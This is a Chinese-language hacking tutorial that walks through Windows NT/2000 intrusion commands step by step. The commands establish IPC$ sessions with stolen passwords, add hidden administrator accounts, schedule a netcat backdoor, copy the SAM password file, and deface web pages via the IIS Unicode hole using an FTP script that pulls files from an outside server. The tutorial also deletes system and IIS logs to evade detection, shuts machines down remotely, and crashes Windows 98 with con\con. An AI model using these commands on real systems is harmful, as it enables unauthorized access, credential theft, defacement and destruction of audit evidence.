入侵命令詳解

入侵命令詳解


作者：Net·PoliCe QQ:326490
出處：http://www.cnsafe.org/『安全驛站』

1：NET
隻要你擁有某IP的用戶名和密碼，那就用IPC\$做連接吧！
這裏我們假如你得到的用戶是hbx，密碼是123456。假設對方IP為127.0.0.1
net use [url=file://\\127.0.0.1\ipc\$]\\127.0.0.1\ipc\$[/url] 123456 /user:hbx null密碼為空
退出的命令是
net use [url=file://\\127.0.0.1\ipc\$]\\127.0.0.1\ipc\$[/url] /delete
--------------------------------
net share是查看主機共享資源我們用它建一個秘密共享目錄吧net share me=c:\winnt\system32 這樣這個機器就有了一個名為me的共享目錄，而打開它就是winnt下的system32目錄，如果你用win2000的係統就知這個目錄有多重要了，如果不想要也好辦net share me /delete 嗬嗬，沒有了，是不是很方便的啊。
---------------------- ---------------------- ----------------------
下麵的操作你必須登陸後才可以用.登陸的方法就在上麵.
---------------------- ---------------------- ----------------------
下麵我們講怎麽創建一個用戶，由於SA的權限相當於係統的超級用戶.
我們加一個heibai的用戶密碼為lovechina
net user heibai lovechina /add
隻要顯示命令成功，那麽我們可以把他加入Administrator組了.
net localgroup Administrators heibai /add
----------------------
這裏是講映\*對方的C盤，當然其他盤也可以，隻要存在就行了.我們這裏把對方的C盤映\*到本地的Z盤.
net use z:\\127.0.0.1\c\$
----------------------
net start telnet
這樣可以打開對方的TELNET服務.
----------------------
這裏是將Guest用戶激活，guest是NT的默認用戶，而且無法刪除呢？不知道是否這樣，我的2000就是刪除不了它。
net user guest /active:yes(特別注意:這個命令是把原來被禁用的guest帳戶再次激活)
----------------------
net user guest /active:no這樣這個guest的用戶就又被禁用了
----------------------
這裏是把一個用戶的密碼改掉，我們把guest的密碼改為lovechina，其他用戶也可以的。隻要有權限就行了呀！
net user guest lovechina
有人問到提高權限的問題 下麵就解決下
net localgroup administrators guest /add
將guest變為administrator
net命令果然強大啊！ net view命令看對方開了共享
-------------------------------------------------------------------------------------------------------------
net user是查看所有用戶列表，看看哪個用戶是和你一樣偷跑進來的，給他名給刪掉，讓他美，
net user 用戶名 /delete哈哈,他沒有了,管他什麽是不是管理員呢,不過我們還是查一下管理員組有什麽用戶吧,這樣的用戶才對我們有用嘛 net localgroup administrators就列出管理員組成員了,再查看一下administrator這個用戶，因為這個是創建係統時建出來的，所以要看看他的係統是什麽時間創建出來的
net user administrator，然後再查看別的管理員用戶是什麽時間創建的，如果相差太遠，那可能是被別人偷偷跑來偷建的，一律del，安全第一哦................
---------------------------------------------------------------------------------------------------------------------------
2:at
一般一個入侵者入侵後都會留下後門，也就是種木馬了，你把木馬傳了上去，怎麽啟動他呢？
那麽需要用AT命令，這裏假設你已經登陸了那個服務器。
----------------------
你首先要得到對方的時間，
net time [url=file://\\127.0.0.1]\\127.0.0.1[/url]
----------------------
將會返回一個時間，這裏假設時間為12:1，現在需要新建一個作業，其ID=1
at [url=file://\\127.0.0.1]\\127.0.0.1[/url] 12:3 nc.exe
這裏假設了一個木馬，名為NC.EXE，這個東西要在對方服務器上.
這裏介紹一下NC，NC是NETCAT的簡稱，為了方便輸入，一般會被改名.它是一個TELNET服務，端口為99.
等到了12:3就可以連接到對方的99端口.這樣就給對方種下了木馬.
-----------------------------------------------------
at命令功能強大,下麵可以打個比方:
C:\> AT 22:30 Start C:\prettyboy.mp3
新加了一項作業，其作業 ID = 1 [現在我們新建立了一個任務 在22:30分 係統將自動播放歌曲]
---------------------------------------------------------------------------------------------------------------------------
3:telnet
這個命令非常實用，它可以與遠方做連接，不過正常下需要密碼、用戶，不過你給對方種了木馬，直接連到這個木馬打開的端口.
telnet 127.0.0.1 99
這樣就可以連到對方的99端口.那你就可以在對方運行命令了，這個也就是肉雞.
---------------------------------------------------------------------------------------------------------------------------
4:FTP
它可以將你的東西傳到對方機子上，你可以去申請個支持FTP上傳的空間，國內多的是，如果真的找不到，我給WWW.51.NET，不錯的.當我們申請完後，它會給用戶名，密碼，以及FTP服務器.
在上傳前需要登陸先，這裏我們假設FTP服務器WWW.51.NET，用戶名是HUCJS，密碼是654321
ftp www.51.net
他會要求輸入用戶，成功後會要求輸入密碼.
----------------------
下麵先說上傳，假設你需上傳的文件是INDEX.HTM，它位於C:\下，傳到對方D:\
get c:\index.htm d:\
假設你要把對方C盤下的INDEX.HTM，下到你的機子的D盤下
put c:\index.htm d:\
--------------------------------------------------
這裏的問題是兩個命令的解釋正好弄反了，登陸ＦＴＰ服務器後get才是下載，而put命令是上傳，這和tftp的命令正好相反，在tftp命令裏get是上傳put是下載，這下明白了吧，而且在ＦＴＰ服務器中不能用c:\和d:\這樣來指明路徑，這也是在tftp裏麵用的方法，FTP可不會執行的，不信你去試好了，正確應該這樣上傳文件put index.htm這樣就足夠了，裝c盤根目錄下的index.htm文件上傳到FTP服務器的當前目錄下，不喜歡就del index.htm刪掉這文件，下載時先查看一下目錄，dir然後看這個目錄裏有什麽，有你要的你就get index.htm這樣就把index.htm這個文件下載到你自己的c盤根目錄下了。
--------------------------------------------------------------
get index.htm c:\inetpub\wwwroot\index.htm（這裏是把你空間上的index.htm下載到對方的c:\inetpub\wwwroot\index.htm）"
--------------------------------------------------------------------------------
5:copy
下麵我說說怎樣把本地的文件複製到對方硬盤上去， 需要建立好IPC\$連接才有效。
這裏我們把本地C盤下的index.htm複製到127.0.0.1的C盤下
copy index.htm [url=file://\\127.0.0.1\c\$\index.htm]\\127.0.0.1\c\$\index.htm[/url]
----------------------
如果你要複製到D盤下 把C改為D， 就行了！
copy index.htm [url=file://\\127.0.0.1\d\$\index.htm]\\127.0.0.1\d\$\index.htm[/url]
----------------------
如果你要把他複製到 WINNT 目錄裏
就要把輸入
copy index.htm [url=file://\\127.0.0.1\admin\$\index.htm]\\127.0.0.1\admin\$\index.htm[/url]
admin\$是winnt
---------------------
要把對方的文件複製過來，順便告訴大家 NT的備份的數據庫放在x:\winnt\repair\sam._ sam._是數據庫的文件名
---------------------- ----------------------
下麵就把127.0.0.1的數據庫複製到本地C盤下
copy [url=file://\\127.0.0.1\admin\$\repair\sam]\\127.0.0.1\admin\$\repair\sam[/url]._ c:\
這個sam._這明顯是NT主機的口令檔，如果是win2000機器的口令文件應該是sam
---------------------------------------------------------------------------------------------------------------------------
6：set
如果你跑進了一部機子，而且想黑他（這思想隻能在特別時候才準有），當然他的80端口要開，不然你黑給誰看。這時需要用SET命令！
下麵是我得到的結果！我來分析它，隻是找主頁在那而已。
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=當前登陸者的IP，這裏本來是顯示我的IP，被我刪除了
HTTP_ACCEPT_ENCODING=gzip， deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主頁放在的地址，隻要你看到PATH_TRANSLATED=的後麵就是主頁的存放地址。這裏是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3， GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=\$P\$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
_NAME=/s/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0對方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
粉紅色的那行就是對方主頁存放地址，這裏告訴大家一個技巧，很笨的技巧啊，不過隻能用這個方法才能100%的找到主頁的名稱，當你DIR這個目錄時，一定會看到很多文件，你可以把所有文件在瀏覽器這樣輸入XX.XX.XX.XX/文件名，這樣隻要看到和XX.XX.XX.XX看到的也麵一模一樣，那麽這就是主頁的名稱了。
---------------------------------------------------------------------------------------------------------------------------
7：nbtstat
如果你掃到一部NT的機子，他的136到139其中一個端口開了的話，就要用這個命令得到用戶了。順便告訴大家這是netbios，得到用戶名後就可以猜猜密碼了。例如比較簡單的密碼，密碼和用戶名一樣的，都試下，不行就暴力破解吧！
現在網上很多NT的機子都開了這些端口的，你可以練習下，我們來分析得到的結果。
命令是
nbtstat -A XX.XX.XX.XX
-A一定要大寫哦。
這個我認為大不大寫沒有太大差別，用處還是一樣的。
之後用net use \\對方IP 連接一下！
net view \\對方IP 查看對方共享文件夾
net use X: [url=file://\\IP\]\\IP\[/url]對方共享文件 映\*對方共享文件夾成為本機的X盤
這就是139端口的基本用法！不過前提是必須對方開共享！
netstat -n看看誰連接你
-----------------
下麵是得到的結果。
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII UNIQUE
PENTIUMII UNIQUE
ORAHOTOWN GROUP
ORAHOTOWN GROUP
ORAHOTOWN UNIQUE
PENTIUMII UNIQUE
INet~Services GROUP
IS~PENTIUMII... UNIQUE
ORAHOTOWN GROUP
ORAHOTOWN UNIQUE
..__MSBROWSE__. GROUP

粉紅色的就是登陸過這部係統的用戶，可能你不知道怎麽看，大家是不是看到了一竄數字，隻要這竄數字是 的話，那他前麵的就是用戶. 這裏的用戶是PENTIUMII。
沒有03說明:MAC沒和IP捆在一起了
---------------------------------------------------------------------------------------------------------------------------
8：Shutdown
關了對方的NT服務器的命令
Shutdown [url=file://\\IP]\\IP[/url]地址 t:20
20秒後將NT自動關閉，三思後才能運行這個命令，這樣對對方造很大的損失，要做個有良心的入侵者呀。
Telnet進去用命令或者是本地用什麽軟件重啟對方電腦
shutdown -m \\計算機名稱 可以遠程重起或關閉的
--------------------------------------------------------------------------------
9：DIR
這個命令沒什麽好講，但是卻非常重要，他是查看一目錄裏的所有文件、文件夾。
你可以本地試下。
--------------------------------------------------------------------------------
10：echo
著名的漏洞Unicode，這個命令可以簡單的黑一下有這個漏洞的主機。
我們假設我們要把“南京大屠殺鐵證如山，任何日本人不得抵賴！”寫入index.htm，有2種方法，大家看看有什麽區別。
-------------------------------------------------------
echo 南京大屠殺鐵證如山，任何日本人不得抵賴！>index.htm
echo 南京大屠殺鐵證如山，任何日本人不得抵賴！>>index.htm
-------------------------------------------------------
第一個的意思是覆蓋index.htm原有的內容，把“南京大屠殺鐵證如山，任何日本人不得抵賴！”寫進index.htm。
第二個的意思是把“南京大屠殺鐵證如山，任何日本人不得抵賴！”加到index.htm裏麵。
-------------------------------------------------------
“>>”產生的內容將追加進文件中，“>”則將原文件內容覆蓋。
這裏說明一下，是重定向命令隻是一個是輸入重定向另一個是輸出重定向，比如我們在命令提示符下就會顯示c:\>這個意思就是把C盤的命令權重定向給我們，同樣：也是定向的命令也叫作管道，它是用來連接兩個命令的管道，先執行管道左邊的命令，再執行管道右邊的命令，不過我是沒能耐把DOS命令說明白的，想研究就買本dos大全看吧，夠看半年的了。
-------------------------------------------------------
大家可以本地試下。
可能你會問，這樣簡單黑下有什麽好玩的，其實他可以用來下載主頁到對方的目錄裏。
1、首先，我們需要申請一個免費的主頁空間。
2、用echo在可寫目錄下建立如下內容的txt文件：（以chinren服務器為例。）
open upload.chinaren.com（你的FTP服務器，申請時你的空間提供商會給你的）
cnhack（你申請時的用戶名）
test（你申請時的密碼）
get index.htm c:\inetpub\wwwroot\index.htm（這裏是把你空間上的index.htm下載到對方的c:\inetpub\wwwroot\index.htm）
bye（退出FTP對話，相當在98下的DOS，用EXIT退出DOS）
---------------------------------------------
具體的做法：
輸入 echo open upload.chinaren.com> c:\cnhack.txt
輸入 echo cnhack >> c:\cnhack.txt
輸入 echo 39abs >> c:\cnhack.txt
輸入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最後輸入 ftp -s:c:\cnhack.txt （利用ftp的-s參數，執行文件裏的內容。）
等命令完成時，文件已經下載到你指定的文件裏了。
-----------------------
注意：取得文件後，請刪除cnhack.txt。（如果不刪除，很容易會給別人看到你的密碼。）
記得要 del c:\cnhack.txt
--------------------------------------------------------------------------------
11:attrib
這個命令是設置文件屬性的。如果你想黑一個站，而他的主頁的文件屬性設置了隻讀，那就很可憐呀，想刪除他也不行，想覆蓋他也不行。倒！不過有這個命令就別怕了。
attrib -r index.htm
這個命令是把index.htm的隻讀屬性去掉。
如果把“-”改為“+”則是把這個文件的屬性設置為隻讀
----------------------
attrib +r index.htm
這個命令是把index.htm的屬性設置為隻讀。
----------------------------------------
attrib這個命令先要用來查屬性，比如attrib 文件名，這樣就顯示出這個文件的屬性了，它不止有R這個屬性，其實一共有四種屬性， a 檔案屬性 r 隻讀屬性 h隱含屬性 s係統屬性，我們想用哪個就用哪個，我覺得把我們上傳的文件加個隱含屬性更有意思，，，，，繼續挑那貼的錯.
---------------------------------------------------------------------------------------------------------------------------
12:del
當你看到這個標題可別倒下啊！現在要離開127.0.0.1了，要刪除日誌，當然要刪除日誌啦！想被捉嗎。嗬嗬。
NT的日誌有這些
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
隻要刪除這些就可以了。有些係統NT安裝在D盤或其他盤，就要把C改成其他盤。
Internet信息服務FTP日誌默認位置：%systemroot%\system32\logfiles\msftpsvc1\，默認每天一個日誌
Internet信息服務WWW日誌默認位置：%systemroot%\system32\logfiles\w3svc1\，默認每天一個日誌
Scheduler服務日誌默認位置：%systemroot%\schedlgu.txt
以上日誌在注冊表裏的鍵：
應用程序日誌，安全日誌，係統日誌，DNS服務器日誌，它們這些LOG文件在注冊表中的：
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog
有的管理員很可能將這些日誌重定位。其中EVENTLOG下麵有很多的子表，裏麵可查到以上日誌的定位目錄。
Schedluler服務日誌在注冊表中
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
--------------------------------------------------------------------
del確實是刪除文件用的，log也確實是日誌文件類型，不過按上麵這種方法是不可能清理掉你自身的日誌的，因為係統自動運行著日誌記錄，你在做這些時它一直都在記錄著，並沒有停止，大家也會常看到，有時刪除某個文件時會提示係統正在占用拒絕刪除的，嗬嗬，這就明白了，係統正在運行的東西已經駐留內存裏，當然不能這樣刪除掉了，大家怕了吧，這樣刪等於幫別人清理了日誌，沒刪自己那份啊，哈哈哈哈，要問我怎麽清理，我隻說大家還是用小榕的工具來清吧，那個又快又好，我們何必去用那些煩瑣的命令行呢，尤其對生長在windows桌麵操作下的人們那顯然是太麻煩了，我推薦小榕的elsave工具，清理日誌又快又幹淨，還省電呢，嘻嘻，我可不是做廣告來的。
-------------------------------------------------------------------------
借助第三方工具：如小榕的elsave.exe遠程清除system,applicaton,security的軟件，
使用方法很簡單，首先利用獲得的管理員賬號與對方建立ipc會話，net use [url=file://\\ip]\\ip[/url] pass /us
er: user
然後命令行下：elsave -s [url=file://\\ip]\\ip[/url] -l application -C，這樣就刪除了安全日誌。
其實利用這個軟件還可以進行備份日誌，隻要加一個參數 -f filename就可以了，在此不再詳述。
--------------------------------------------------------------------------------
局域網要別人死機? 他C盤開了共享的話(win98,而且沒有打補丁),你在DOS下輸入
\\他的IP或機器名\c\con\con